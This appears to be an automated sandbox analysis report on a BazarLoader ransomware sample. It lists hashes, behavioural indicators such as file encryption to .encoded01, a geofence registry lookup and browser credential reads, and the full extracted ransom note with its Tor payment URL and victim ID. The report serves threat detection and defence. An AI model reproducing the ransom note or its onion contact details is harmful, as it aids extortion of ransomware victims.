bazarloader | 315045e506eb5e9f5fd24e4a55cda48d223ac3450037586ce6dab70afc8ddfc9

Analysis

max time kernel
188s
max time network
168s
platform
windows10_x64
resource
win10-en-20211104
submitted
12/11/2021, 09:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
Size

58KB
MD5

1cc5b508da9567f032ed78375bb45959
SHA1

c31a0e58ae70f571bf8140db8a1ab20a7f566ab5
SHA256

315045e506eb5e9f5fd24e4a55cda48d223ac3450037586ce6dab70afc8ddfc9
SHA512

cef3bdf76e94904e0d170d3d208accef9ff8e50b85403130b12914ee6b20f0e49f58aa840757c7855b656cffa4400b83cd81fc5196fea66045a5724886970d61

Score

10^/10

bazarloader dropper loader ransomware spyware stealer

Malware Config

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-1042495040-510797905-2613508344-1000\BackFiles_encoded01.txt

Ransom Note

[+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension .encoded01. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt 1-5 files for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You can open our site by the shortcut "SUPPORT (TOR_BROWSER)" created on the desktop. Also as the second option you can install the tor browser: a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website. Full link will be provided below. ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! ----------------------------------------------------------------------------------------- Your ID: mMuO7yV2SabitZONNkW5UPOl5NlDMwuw%2BIWgw1YloCHRm7PeEEJnkNObpLwYcIh2%2FbO2mQobKcyKiLL2EnGIY6W%2F341WGA7V1vP%2B438O9GOs55a%2FExwrnobn%2FetHK8FO1PG9z11AfYbK9%2BbkWiGDaajx6cVcBCiDyNn761oizze2%2FaiJTBJ09dLF1%2BZGKfwbwLGc1TFXf7P6hfLpACGyRvOH%2F7sARA%2FntcDe1UUW2ir1loOJHDt5lMLR%2B%2Bs2IYZA4KfHpHURf%2B6J%2FMHJAzCBJ62ioI84Rie5%2FoHY91VFh2%2Frku%2B3RjwOkdTN6%2BZCDOoU9JXuhF9AD7b06P%2FgK12Fftf%2F%2FdhjIB7epNGg9XsLjSjN9YiZLSckmp6C0sA1fac0wZK7jUggLIPQ99vLZgfDH%2BO775kuOTuw7YTloFVRlGH8mMueHE5w0ImM9stsCtI63feOmBwXeZ7Y%2B%2B7xDGHSfvW6%2FblqLnDCieziz0Qf%2B2bb%2BK25GSgiw56C1v8ka9lf7oDCgHMmbJSghtnYbhT6Jsq5oJ4zCCCkzub3wBR0hm7AgceCV1N74IuB3N1uD4oB8YiA2k4EH7DM18PsDSWGQ%2Bu4uo59BHHSg9br%2FBN3%2Fxz5j%2BylOScUm%2FjK0LYpeJAiqo2r3Wc9AeuogcXhQ3yPCuCnrp0VOjuF7Pf9sxRJgnHNu6vdZxMm743lys4Od%2FEFqJTslRUILpeegtbWM0C0bamCyahjRznk1vnSyQ9yzWXYiJvYTwYZve7K0fQNNtNBqqb3tk0DcJ%2FV1%2BPCBnfrE%2FCkkN4iFQW%2BjJWmwz5bhmv9kbnYaz8GyqP62fpGEIl1qIOYmEM%2BA7XM2v7wDlC5UNSx94JLPSrxrdnlvwQx4BzVtYjJSDQVmNnypPwpNtNBq57ArQBED%2FOk1MnFBnzeHKukjN4jSxm17PzF4SJD0E%2Bt8tTWXyJ7xKjjx%2BoDL5xi2KTvyUg0Gr2DwObGKUGvTtnuvKl8MQvLjOXq63kxyjv3sI2JTRM8hN%2F2rNUrW6giqonYhlFGG5bQz6G8RA6NB%2F6Dv6k%2FPCeCweDG0ShFs06rh9uhdgZ59Kjz5OcEd%2F8R3qazqjEwBbrf%2BOPzNVu4NvSx6o5mIyXnuM2gvn83yxLrqvzePEd0tcHUxOwfNtNF3r63lnUyD5e0xsS8WT37PtDxipo4BSDB%2FpWmxx9QlEbWvPa9VwQC0ojh6cZFF8gqooiPjQkQfJ%2FX%2FuzwAFnZUr34yg%3D%3D Your support onion(TOR) url: http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion/gate.php?data=mMuO7yV2SabitZONNkW5UPOl5NlDMwuw%2BIWgw1YloCHRm7PeEEJnkNObpLwYcIh2%2FbO2mQobKcyKiLL2EnGIY6W%2F341WGA7V1vP%2B438O9GOs55a%2FExwrnobn%2FetHK8FO1PG9z11AfYbK9%2BbkWiGDaajx6cVcBCiDyNn761oizze2%2FaiJTBJ09dLF1%2BZGKfwbwLGc1TFXf7P6hfLpACGyRvOH%2F7sARA%2FntcDe1UUW2ir1loOJHDt5lMLR%2B%2Bs2IYZA4KfHpHURf%2B6J%2FMHJAzCBJ62ioI84Rie5%2FoHY91VFh2%2Frku%2B3RjwOkdTN6%2BZCDOoU9JXuhF9AD7b06P%2FgK12Fftf%2F%2FdhjIB7epNGg9XsLjSjN9YiZLSckmp6C0sA1fac0wZK7jUggLIPQ99vLZgfDH%2BO775kuOTuw7YTloFVRlGH8mMueHE5w0ImM9stsCtI63feOmBwXeZ7Y%2B%2B7xDGHSfvW6%2FblqLnDCieziz0Qf%2B2bb%2BK25GSgiw56C1v8ka9lf7oDCgHMmbJSghtnYbhT6Jsq5oJ4zCCCkzub3wBR0hm7AgceCV1N74IuB3N1uD4oB8YiA2k4EH7DM18PsDSWGQ%2Bu4uo59BHHSg9br%2FBN3%2Fxz5j%2BylOScUm%2FjK0LYpeJAiqo2r3Wc9AeuogcXhQ3yPCuCnrp0VOjuF7Pf9sxRJgnHNu6vdZxMm743lys4Od%2FEFqJTslRUILpeegtbWM0C0bamCyahjRznk1vnSyQ9yzWXYiJvYTwYZve7K0fQNNtNBqqb3tk0DcJ%2FV1%2BPCBnfrE%2FCkkN4iFQW%2BjJWmwz5bhmv9kbnYaz8GyqP62fpGEIl1qIOYmEM%2BA7XM2v7wDlC5UNSx94JLPSrxrdnlvwQx4BzVtYjJSDQVmNnypPwpNtNBq57ArQBED%2FOk1MnFBnzeHKukjN4jSxm17PzF4SJD0E%2Bt8tTWXyJ7xKjjx%2BoDL5xi2KTvyUg0Gr2DwObGKUGvTtnuvKl8MQvLjOXq63kxyjv3sI2JTRM8hN%2F2rNUrW6giqonYhlFGG5bQz6G8RA6NB%2F6Dv6k%2FPCeCweDG0ShFs06rh9uhdgZ59Kjz5OcEd%2F8R3qazqjEwBbrf%2BOPzNVu4NvSx6o5mIyXnuM2gvn83yxLrqvzePEd0tcHUxOwfNtNF3r63lnUyD5e0xsS8WT37PtDxipo4BSDB%2FpWmxx9QlEbWvPa9VwQC0ojh6cZFF8gqooiPjQkQfJ%2FX%2FuzwAFnZUr34yg%3D%3D

URLs

http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion/gate.php?data=mMuO7yV2SabitZONNkW5UPOl5NlDMwuw%2BIWgw1YloCHRm7PeEEJnkNObpLwYcIh2%2FbO2mQobKcyKiLL2EnGIY6W%2F341WGA7V1vP%2B438O9GOs55a%2FExwrnobn%2FetHK8FO1PG9z11AfYbK9%2BbkWiGDaajx6cVcBCiDyNn761oizze2%2FaiJTBJ09dLF1%2BZGKfwbwLGc1TFXf7P6hfLpACGyRvOH%2F7sARA%2FntcDe1UUW2ir1loOJHDt5lMLR%2B%2Bs2IYZA4KfHpHURf%2B6J%2FMHJAzCBJ62ioI84Rie5%2FoHY91VFh2%2Frku%2B3RjwOkdTN6%2BZCDOoU9JXuhF9AD7b06P%2FgK12Fftf%2F%2FdhjIB7epNGg9XsLjSjN9YiZLSckmp6C0sA1fac0wZK7jUggLIPQ99vLZgfDH%2BO775kuOTuw7YTloFVRlGH8mMueHE5w0ImM9stsCtI63feOmBwXeZ7Y%2B%2B7xDGHSfvW6%2FblqLnDCieziz0Qf%2B2bb%2BK25GSgiw56C1v8ka9lf7oDCgHMmbJSghtnYbhT6Jsq5oJ4zCCCkzub3wBR0hm7AgceCV1N74IuB3N1uD4oB8YiA2k4EH7DM18PsDSWGQ%2Bu4uo59BHHSg9br%2FBN3%2Fxz5j%2BylOScUm%2FjK0LYpeJAiqo2r3Wc9AeuogcXhQ3yPCuCnrp0VOjuF7Pf9sxRJgnHNu6vdZxMm743lys4Od%2FEFqJTslRUILpeegtbWM0C0bamCyahjRznk1vnSyQ9yzWXYiJvYTwYZve7K0fQNNtNBqqb3tk0DcJ%2FV1%2BPCBnfrE%2FCkkN4iFQW%2BjJWmwz5bhmv9kbnYaz8GyqP62fpGEIl1qIOYmEM%2BA7XM2v7wDlC5UNSx94JLPSrxrdnlvwQx4BzVtYjJSDQVmNnypPwpNtNBq57ArQBED%2FOk1MnFBnzeHKukjN4jSxm17PzF4SJD0E%2Bt8tTWXyJ7xKjjx%2BoDL5xi2KTvyUg0Gr2DwObGKUGvTtnuvKl8MQvLjOXq63kxyjv3sI2JTRM8hN%2F2rNUrW6giqonYhlFGG5bQz6G8RA6NB%2F6Dv6k%2FPCeCweDG0ShFs06rh9uhdgZ59Kjz5OcEd%2F8R3qazqjEwBbrf%2BOPzNVu4NvSx6o5mIyXnuM2gvn83yxLrqvzePEd0tcHUxOwfNtNF3r63lnUyD5e0xsS8WT37PtDxipo4BSDB%2FpWmxx9QlEbWvPa9VwQC0ojh6cZFF8gqooiPjQkQfJ%2FX%2FuzwAFnZUr34yg%3D%3D

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0003000000023b46-135.dat	BazarLoaderVar5
behavioral2/files/0x0003000000023b46-136.dat	BazarLoaderVar5

Executes dropped EXE 4 IoCs

pid	Process
2116	firefox.exe
4080	tor.exe
4520	firefox.exe
3644	firefox.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	\??\c:\users\admin\pictures\saveopen.crw.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\pictures\watchgrant.tiff	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\users\admin\pictures\watchgrant.tiff.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	firefox.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe

Loads dropped DLL 27 IoCs

pid	Process
2116	firefox.exe
2116	firefox.exe
2116	firefox.exe
2116	firefox.exe
2116	firefox.exe
2116	firefox.exe
2116	firefox.exe
2116	firefox.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4080	tor.exe
4520	firefox.exe
4520	firefox.exe
4520	firefox.exe
4520	firefox.exe
4520	firefox.exe
4520	firefox.exe
4520	firefox.exe
3644	firefox.exe
3644	firefox.exe
3644	firefox.exe
3644	firefox.exe
3644	firefox.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 32 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\searches\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\libraries\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\$recycle.bin\s-1-5-21-1042495040-510797905-2613508344-1000\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\links\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\pictures\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\saved games\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\common files\microsoft shared\stationery\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\videos\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\downloads\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\pictures\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\videos\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\contacts\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\favorites\links\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\downloads\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\favorites\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\music\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\pictures\camera roll\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\music\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\office16\1033\dataservices\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\onedrive\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\pictures\saved pictures\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\accountpictures\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\public\documents\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\users\admin\documents\desktop.ini	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	whatismyipaddress.com
13	whatismyipaddress.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	\??\c:\program files\java\jdk1.8.0_66\db\bin\stopnetworkserver.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\themes16\slate\slate.inf.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.zunevideo_10.16112.11601.0_x64__8wekyb3d8bbwe\assets\contrast-white\applist.targetsize-36_contrast-white.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\s_forward_18.svg	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files (x86)\Internet Explorer\images\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\licenses16\o365homepremr_subtest1-ppd.xrm-ms	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\microsoft office\thinappxmanifest.xml.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.desktopappinstaller_1.0.10252.0_x64__8wekyb3d8bbwe\assets\contrast-black\apppackageapplist.targetsize-30_contrast-black.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.windowssoundrecorder_10.1702.301.0_x64__8wekyb3d8bbwe\assets\voicerecorderapplist.targetsize-72.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\microsoft office\root\licenses16\onenoter_retail-ppd.xrm-ms.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\microsoft office\root\licenses16\onenotevl_kms_client-ul-oob.xrm-ms.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\muauth.cab.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\files\dev\nls\root\ui-strings.js	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\meta-inf\manifest.mf.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\videolan\vlc\locale\si\lc_messages\vlc.mo	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\mail.config	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.microsoftsolitairecollection_3.14.1181.0_x64__8wekyb3d8bbwe\assets\icons\statistics.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.office.onenote_17.7668.58071.0_x64__8wekyb3d8bbwe\en-us\jscripts\wefgallery_strings.js	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.skypeapp_11.8.204.0_x64__kzf8qxf38zg5c\skypeapp\designs\flags\large\ma_60x42.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\activity-badge\js\nls\da-dk\ui-strings.js.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\office16\sdxs\fa000000027\assets\icons\send2.16.grayf.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\themes16\strtedge\thmbnail.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.microsoftsolitairecollection_3.14.1181.0_x64__8wekyb3d8bbwe\assets\themes\aquarium\aquarium_11s.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\licenses16\powerpoint2019vl_mak_ae-ul-phn.xrm-ms	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\themes16\blends\blends.inf	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.people_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\assets\contrast-white\peoplemedtile.scale-125.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.skypeapp_11.8.204.0_x64__kzf8qxf38zg5c\skypeapp\designs\flags\small\bo_16x11.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\en-GB\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\s_filterselected-focus_32.svg	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\aicuc\images\rhp_world_icon.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\meta-inf\eclipse_.sf	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\assets\apptiles\weatherimages\210x173\31.jpg	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.microsoftsolitairecollection_3.14.1181.0_x64__8wekyb3d8bbwe\arkadium.win10.dailychallenges\assets\diamond_badge_earned.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.office.onenote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6449_40x40x32.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.skypeapp_11.8.204.0_x64__kzf8qxf38zg5c\skypeapp\designs\flags\large\mn_60x42.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\BackFiles_encoded01.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\7-zip\history.txt	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\microsoft office\root\licenses16\powerpointr_retail-ppd.xrm-ms	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\assets\apptiles\weatherimages\423x173\34.jpg	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File created	\??\c:\program files\java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css.encoded01	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.windowsfeedbackhub_1.1612.10312.0_x64__8wekyb3d8bbwe\assets\insiderhubapplist.targetsize-96.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
File opened for modification	\??\c:\program files\windowsapps\microsoft.windowsmaps_5.1611.10393.0_x64__8wekyb3d8bbwe\assets\secondarytiles\home\contrast-white\largetile.scale-200.png	jaUgZXVa4Lre4nNpUGLvLJ2baxDc4ODmB0INEt2y.exe
